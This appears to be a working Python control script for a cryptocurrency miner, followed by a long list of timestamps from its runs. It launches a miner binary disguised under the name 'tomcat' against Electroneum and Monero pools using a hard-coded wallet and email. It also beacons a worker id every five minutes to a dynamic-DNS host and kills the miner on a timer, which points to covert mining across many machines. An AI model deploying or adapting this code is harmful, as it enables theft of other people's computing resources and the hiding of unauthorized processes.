import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:43:07.139746
#2018-02-17 16:30:07.548577
#2018-02-17 18:19:03.644879
#2018-02-17 20:07:01.724454
#2018-02-17 21:54:07.056618
#2018-02-17 23:39:06.498357
#2018-02-18 01:28:01.791582
#2018-02-18 03:15:06.893764
#2018-02-18 05:04:05.051681
#2018-02-18 06:57:06.274199
#2018-02-18 08:45:04.876752
#2018-02-18 10:32:04.484302
#2018-02-18 12:17:04.641373
#2018-02-18 14:04:01.794090
#2018-02-18 15:54:02.133205
#2018-02-18 17:44:02.096446
#2018-02-18 19:34:04.220610
#2018-02-18 21:19:07.023025
#2018-02-18 23:07:04.369539
#2018-02-19 00:54:06.919929
#2018-02-19 02:41:02.000866
#2018-02-19 04:28:01.884054
#2018-02-19 06:13:05.398726
#2018-02-19 07:59:05.663974
#2018-02-19 09:50:07.489836
#2018-02-19 11:40:06.466656
#2018-02-19 13:28:04.265108
#2018-02-19 15:18:04.565249
#2018-02-19 17:07:07.630894
#2018-02-19 18:52:08.221573
#2018-02-19 20:40:09.765180
#2018-02-19 22:27:01.682113
#2018-02-20 00:13:07.132143
#2018-02-20 02:02:05.631215
#2018-02-20 03:52:01.973394
#2018-02-20 05:35:08.436077
#2018-02-20 07:19:01.884131
#2018-02-20 09:05:06.860951
#2018-02-20 10:48:07.915915
#2018-02-20 12:35:01.662485
#2018-02-20 14:20:02.002604
#2018-02-20 16:06:09.509884
#2018-02-20 17:52:08.116309
#2018-02-20 19:44:07.399488
#2018-02-20 21:33:04.450540
#2018-02-20 23:16:05.847411
#2018-02-21 01:02:04.991000
#2018-02-21 02:49:05.447382
#2018-02-21 04:38:04.137060
#2018-02-21 07:58:12.295814
#2018-02-21 09:44:06.085184
#2018-02-21 11:33:05.326929
#2018-02-21 13:21:09.484298
#2018-02-21 15:06:07.685139
#2018-02-21 16:56:01.689742
#2018-02-21 18:44:08.751596
#2018-02-21 20:33:05.747072
#2018-02-21 22:20:06.039676
#2018-02-22 00:09:07.621934
#2018-02-22 01:56:07.670095
#2018-02-22 03:43:05.342899
#2018-02-22 05:30:11.110693
#2018-02-22 07:15:06.908882
#2018-02-22 09:04:01.671233
#2018-02-22 10:51:09.402327
#2018-02-22 12:37:04.846579
#2018-02-22 14:21:07.211939
#2018-02-22 16:09:14.267352
#2018-02-22 17:56:01.491269
#2018-02-22 19:47:10.501753
#2018-02-22 21:38:01.317707
#2018-02-22 23:24:04.515035
#2018-02-23 01:11:06.274624
#2018-02-23 02:57:05.129259
#2018-02-23 04:43:06.922505
#2018-02-23 06:29:06.875550
#2018-02-23 08:17:01.579526
#2018-02-23 10:34:02.182795
#2018-02-23 12:27:05.559704
#2018-02-23 14:14:02.020105
#2018-02-23 16:04:01.752157
#2018-02-23 17:49:04.543859
#2018-02-23 19:36:01.354681
#2018-02-23 21:19:01.360733
#2018-02-23 23:07:06.585671
#2018-02-24 00:56:05.905663
#2018-02-24 02:51:01.877438
#2018-02-24 04:41:06.682604
#2018-02-24 06:25:05.669419
#2018-02-24 08:13:03.807977
#2018-02-24 09:56:05.015503
#2018-02-24 11:50:09.561828
#2018-02-24 13:41:07.478946
#2018-02-24 15:28:03.615891
#2018-02-24 17:20:09.340758
#2018-02-24 19:10:01.552171
#2018-02-24 20:58:07.165644
#2018-02-24 23:27:03.699181
#2018-02-25 02:50:01.408234
#2018-02-25 06:22:03.521985
#2018-02-25 11:39:07.983930